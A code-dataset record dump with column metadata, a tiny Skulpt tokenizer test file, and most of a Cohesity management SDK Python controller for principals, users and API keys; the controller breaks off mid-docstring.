hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
50585b9bd676ad66c6990e4ed93b9530d939d67c
30
py
Python
test/tokenize/t38.py
timmartin/skulpt
2e3a3fbbaccc12baa29094a717ceec491a8a6750
[ "MIT" ]
2,671
2015-01-03T08:23:25.000Z
2022-03-31T06:15:48.000Z
test/tokenize/t38.py
csev/skulpt
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
[ "MIT" ]
972
2015-01-05T08:11:00.000Z
2022-03-29T13:47:15.000Z
test/tokenize/t38.py
csev/skulpt
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
[ "MIT" ]
845
2015-01-03T19:53:36.000Z
2022-03-29T18:34:22.000Z
def k(x): x += 2 x += 5
7.5
10
0.3
7
30
1.285714
0.714286
0
0
0
0
0
0
0
0
0
0
0.125
0.466667
30
3
11
10
0.4375
0
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
aca10f29ea4ebab920b0665f8c0493432900c163
55,259
py
Python
cohesity_management_sdk/controllers/principals_controller.py
nick6655/management-sdk-python
88e792cb83e5c24a22af495b220c145d0c45841d
[ "Apache-2.0" ]
null
null
null
cohesity_management_sdk/controllers/principals_controller.py
nick6655/management-sdk-python
88e792cb83e5c24a22af495b220c145d0c45841d
[ "Apache-2.0" ]
null
null
null
cohesity_management_sdk/controllers/principals_controller.py
nick6655/management-sdk-python
88e792cb83e5c24a22af495b220c145d0c45841d
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2021 Cohesity Inc. import logging from cohesity_management_sdk.api_helper import APIHelper from cohesity_management_sdk.configuration import Configuration from cohesity_management_sdk.controllers.base_controller import BaseController from cohesity_management_sdk.http.auth.auth_manager import AuthManager from cohesity_management_sdk.models.api_key import ApiKey from cohesity_management_sdk.models.created_api_key import CreatedApiKey from cohesity_management_sdk.models.linux_support_user_bash_shell_access_result import LinuxSupportUserBashShellAccessResult from cohesity_management_sdk.models.linux_support_user_sudo_access_result import LinuxSupportUserSudoAccessResult from cohesity_management_sdk.models.sources_for_sid import SourcesForSid from cohesity_management_sdk.models.principal import Principal from cohesity_management_sdk.models.update_linux_password_result import UpdateLinuxPasswordResult from cohesity_management_sdk.models.user import User from cohesity_management_sdk.models.new_s_3_secret_access_key import NewS3SecretAccessKey from cohesity_management_sdk.exceptions.request_error_error_exception import RequestErrorErrorException class PrincipalsController(BaseController): """A Controller to access Endpoints in the cohesity_management_sdk API.""" def __init__(self, config=None, client=None, call_back=None): super(PrincipalsController, self).__init__(client, call_back) self.logger = logging.getLogger(__name__) self.config = config def list_sources_for_principals(self, sids=None): """Does a GET request to /public/principals/protectionSources. From the passed in list principals (specified by SIDs), return the list of Protection Sources objects and View names that each principal has permission to access. Args: sids (list of string, optional): Specifies a list of security identifiers (SIDs) that specify user or group principals. Returns: list of SourcesForSid: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('list_sources_for_principals called.') # Prepare query URL self.logger.info( 'Preparing query URL for list_sources_for_principals.') _url_path = '/public/principals/protectionSources' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = {'sids': sids} _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for list_sources_for_principals.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for list_sources_for_principals.' ) _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='list_sources_for_principals') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for list_sources_for_principals.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, SourcesForSid.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def update_sources_for_principals(self, body): """Does a PUT request to /public/principals/protectionSources. Specify the security identifier (SID) of the principal to grant access permissions for. Args: body (UpdateSourcesForPrincipalsParams): Request to set access permissions to Protection Sources and Views for a principal. Returns: void: Response from the API. No Content Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('update_sources_for_principals called.') # Validate required parameters self.logger.info( 'Validating required parameters for update_sources_for_principals.' ) self.validate_parameters(body=body) # Prepare query URL self.logger.info( 'Preparing query URL for update_sources_for_principals.') _url_path = '/public/principals/protectionSources' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for update_sources_for_principals.') _headers = {'content-type': 'application/json; charset=utf-8'} # Prepare and execute request self.logger.info( 'Preparing and executing request for update_sources_for_principals.' ) _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request( _request, name='update_sources_for_principals') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for update_sources_for_principals.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) except Exception as e: self.logger.error(e, exc_info=True) raise def search_principals(self, domain=None, object_class=None, search=None, sids=None, include_computers=None): """Does a GET request to /public/principals/searchPrincipals. Optionally, limit the search results by specifying security identifiers (SIDs), an object class (user or group) or a substring. You can specify SIDs or a substring but not both. Args: domain (string, optional): Specifies the domain name of the principals to search. If specified the principals in that domain are searched. Domain could be an Active Directory domain joined by the Cluster or any one of the trusted domains of the Active Directory domain or the LOCAL domain. If not specified, all the domains are searched. object_class (ObjectClassSearchPrincipalsEnum, optional): Optionally filter by a principal object class such as 'kGroup' or 'kUser'. If 'kGroup' is specified, only group principals are returned. If 'kUser' is specified, only user principals are returned. If not specified, both group and user principals are returned. 'kUser' specifies a user object class. 'kGroup' specifies a group object class. 'kComputer' specifies a computer object class. 'kWellKnownPrincipal' specifies a well known principal. search (string, optional): Optionally filter by matching a substring. Only principals in the with a name or sAMAccountName that matches part or all of the specified substring are returned. If specified, a 'sids' parameter should not be specified. sids (list of string, optional): Optionally filter by a list of security identifiers (SIDs) found in the specified domain. Only principals matching the specified SIDs are returned. If specified, a 'search' parameter should not be specified. include_computers (bool, optional): Specifies if Computer/GMSA accounts need to be included in this search. Returns: list of Principal: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('search_principals called.') # Prepare query URL self.logger.info('Preparing query URL for search_principals.') _url_path = '/public/principals/searchPrincipals' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = { 'domain': domain, 'objectClass': object_class, 'search': search, 'sids': sids, 'includeComputers': include_computers } _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for search_principals.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for search_principals.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='search_principals') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for search_principals.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, Principal.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_session_user(self): """Does a GET request to /public/sessionUser. Get the information of the logged in user. Returns: User: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_session_user called.') # Prepare query URL self.logger.info('Preparing query URL for get_session_user.') _url_path = '/public/sessionUser' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_session_user.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_session_user.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_session_user') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for get_session_user.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, User.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def delete_users(self, body=None): """Does a DELETE request to /public/users. Only users from the same domain can be deleted by a single request. If the Cohesity user was created for an Active Directory user, the referenced principal user on the Active Directory domain is NOT deleted. Only the user on the Cohesity Cluster is deleted. Returns Success if the specified users are deleted. Args: body (UserDeleteParameters, optional): Request to delete one or more users on the Cohesity Cluster. Returns: void: Response from the API. No Content Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('delete_users called.') # Prepare query URL self.logger.info('Preparing query URL for delete_users.') _url_path = '/public/users' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for delete_users.') _headers = {'content-type': 'application/json; charset=utf-8'} # Prepare and execute request self.logger.info( 'Preparing and executing request for delete_users.') _request = self.http_client.delete( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='delete_users') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for delete_users.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) except Exception as e: self.logger.error(e, exc_info=True) raise def get_users(self, tenant_ids=None, all_under_hierarchy=None, usernames=None, email_addresses=None, domain=None, partial_match=None): """Does a GET request to /public/users. If no parameters are specified, all users currently on the Cohesity Cluster are returned. Specifying parameters filters the results that are returned. Args: tenant_ids (list of string, optional): TenantIds contains ids of the tenants for which objects are to be returned. all_under_hierarchy (bool, optional): AllUnderHierarchy specifies if objects of all the tenants under the hierarchy of the logged in user's organization should be returned. usernames (list of string, optional): Optionally specify a list of usernames to filter by. All users containing username will be returned. email_addresses (list of string, optional): Optionally specify a list of email addresses to filter by. domain (string, optional): Optionally specify a domain to filter by. If no domain is specified, all users on the Cohesity Cluster are searched. If a domain is specified, only users on the Cohesity Cluster associated with that domain are searched. partial_match (bool, optional): Optionally specify whether to enable partial match. If set, all users with name containing Usernames will be returned. If set to false, only users with exact the same name as Usernames will be returned. By default this parameter is set to true. Returns: list of User: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_users called.') # Prepare query URL self.logger.info('Preparing query URL for get_users.') _url_path = '/public/users' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = { 'tenantIds': tenant_ids, 'allUnderHierarchy': all_under_hierarchy, 'usernames': usernames, 'emailAddresses': email_addresses, 'domain': domain, 'partialMatch': partial_match } _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_users.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info('Preparing and executing request for get_users.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_users') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for get_users.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, User.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def create_user(self, body=None): """Does a POST request to /public/users. If an Active Directory domain is specified, a new user is added to the Cohesity Cluster for the specified Active Directory user principal. If the LOCAL domain is specified, a new user is created directly in the default LOCAL domain on the Cohesity Cluster. Returns the created or added user. Args: body (UserParameters, optional): Request to add or create a new user. Returns: User: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('create_user called.') # Prepare query URL self.logger.info('Preparing query URL for create_user.') _url_path = '/public/users' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for create_user.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for create_user.') _request = self.http_client.post( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='create_user') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for create_user.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, User.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def update_user(self, body=None): """Does a PUT request to /public/users. Returns the user that was updated on the Cohesity Cluster. Args: body (User, optional): Request to update an existing user. Returns: User: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('update_user called.') # Prepare query URL self.logger.info('Preparing query URL for update_user.') _url_path = '/public/users' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for update_user.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for update_user.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='update_user') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for update_user.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, User.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_user_privileges(self): """Does a GET request to /public/users/privileges. List the privileges of the session user. Returns: list of string: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_user_privileges called.') # Prepare query URL self.logger.info('Preparing query URL for get_user_privileges.') _url_path = '/public/users/privileges' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_user_privileges.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_user_privileges.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_user_privileges') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for get_user_privileges.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body) except Exception as e: self.logger.error(e, exc_info=True) raise def create_reset_s_3_secret_key(self, body=None): """Does a POST request to /public/users/s3SecretKey. Returns the new key that was generated. Args: body (ResetS3SecretKeyParameters, optional): Request to reset the S3 secret access key for the specified Cohesity user. Returns: NewS3SecretAccessKey: Response from the API. New S3 Secret Access Key. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('create_reset_s_3_secret_key called.') # Prepare query URL self.logger.info( 'Preparing query URL for create_reset_s_3_secret_key.') _url_path = '/public/users/s3SecretKey' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for create_reset_s_3_secret_key.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for create_reset_s_3_secret_key.' ) _request = self.http_client.post( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='create_reset_s_3_secret_key') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for create_reset_s_3_secret_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize( _context.response.raw_body, NewS3SecretAccessKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_user_api_keys(self, sid, ids=None): """Does a GET request to /public/users/{sid}/apiKeys. Fetch API keys for user. Args: sid (string): Specifies the user sid. ids (list of string, optional): Specifies a list of API key ids. Returns: list of ApiKey: Response from the API. Get lock file status response Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_user_api_keys called.') # Validate required parameters self.logger.info( 'Validating required parameters for get_user_api_keys.' ) self.validate_parameters(sid=sid) # Prepare query URL self.logger.info( 'Preparing query URL for get_user_api_keys.') _url_path = '/public/users/{sid}/apiKeys' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid': sid}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = {'ids': ids} _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for get_user_api_keys.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_user_api_keys.' ) _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_user_api_keys') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for get_user_api_keys.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, ApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def create_user_api_key(self, sid, body): """Does a POST request to /public/users/{sid}/apiKeys. Create an API key for user. Args: sid (string): Specifies the user sid. body (CreateApiKeyParams): Request to create an API key. Returns: CreatedApiKey: Response from the API. Get lock file status response Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('create_user_api_key called.') # Validate required parameters self.logger.info( 'Validating required parameters for create_user_api_key.') self.validate_parameters(sid=sid, body=body) # Prepare query URL self.logger.info('Preparing query URL for create_user_api_key.') _url_path = '/public/users/{sid}/apiKeys' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid': sid}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for create_user_api_key.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for create_user_api_key.') _request = self.http_client.post( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='create_user_api_key') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for create_user_api_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, CreatedApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_user_api_key_by_id(self, id, sid): """Does a GET request to /public/users/{sid}/apiKeys/{id}. Fetch an API key for user by its id. Args: id (string): Specifies the API key id. sid (string): Specifies the user sid. Returns: ApiKey: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_user_api_key_by_id called.') # Validate required parameters self.logger.info( 'Validating required parameters for get_user_api_key_by_id.') self.validate_parameters(id=id, sid=sid) # Prepare query URL self.logger.info('Preparing query URL for get_user_api_key_by_id.') _url_path = '/public/users/{sid}/apiKeys/{id}' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid':sid, 'id': id}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_user_api_key_by_id.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_user_api_key_by_id.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_user_api_key_by_id') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for get_user_api_key_by_id.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, ApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def update_user_api_key(self, sid, id, body): """Does a PUT request to /public/users/{sid}/apiKeys/{id}. Update an API key. Args: sid (string): Specifies the user sid. id (string): Specifies the API key id. body (UpdateApiKeyParams): Request to update an API key. Returns: CreatedApiKey: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('update_user_api_key called.') # Validate required parameters self.logger.info( 'Validating required parameters for update_user_api_key.') self.validate_parameters(sid=sid, id=id, body=body) # Prepare query URL self.logger.info('Preparing query URL for update_user_api_key.') _url_path = '/public/users/{sid}/apiKeys/{id}' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid':sid, 'id': id}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for update_user_api_key.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for update_user_api_key.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='update_user_api_key') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for update_user_api_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, CreatedApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def delete_user_api_key(self, sid, id): """Does a DELETE request to /public/users/{sid}/apiKeys/{id}. Delete an API key for user. Args: sid (string): Specifies the user sid. id (string): Specifies the API key id. Returns: void: Response from the API. No Content Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('delete_user_api_key called.') # Validate required parameters self.logger.info('Validating required parameters for delete_user_api_key.') self.validate_parameters(sid=sid, id=id) # Prepare query URL self.logger.info('Preparing query URL for delete_user_api_key.') _url_path = '/public/users/{sid}/apiKeys/{id}' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'id': id, 'sid':sid}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare and execute request self.logger.info( 'Preparing and executing request for delete_user_api_key.') _request = self.http_client.delete(_query_url) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='delete_user_api_key') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for delete_user_api_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) except Exception as e: self.logger.error(e, exc_info=True) raise def rotate_user_api_key(self, id, sid): """Does a POST request to /public/users/{sid}/apiKeys/{id}/rotate. Fetch an API key for user by its id. Args: sid (string): Specifies the user sid. id (string) Specifies the API key id. Returns: CreatedApiKey: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('rotate_user_api_key called.') # Validate required parameters self.logger.info( 'Validating required parameters for rotate_user_api_key.' ) self.validate_parameters(sid=sid, id=id) # Prepare query URL self.logger.info( 'Preparing query URL for rotate_user_api_key.') _url_path = '/public/users/{sid}/apiKeys/{id}/rotate' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid':sid, 'id': id}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for rotate_user_api_key.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for rotate_user_api_key.' ) _request = self.http_client.post(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request( _request, name='rotate_user_api_key') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for rotate_user_api_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize( _context.response.raw_body, CreatedApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_all_user_api_keys(self, user_sids=None): """Does a GET request to /public/usersApiKeys. Fetch API keys across all users. Args: user_sids (list of string, optional): Specifies 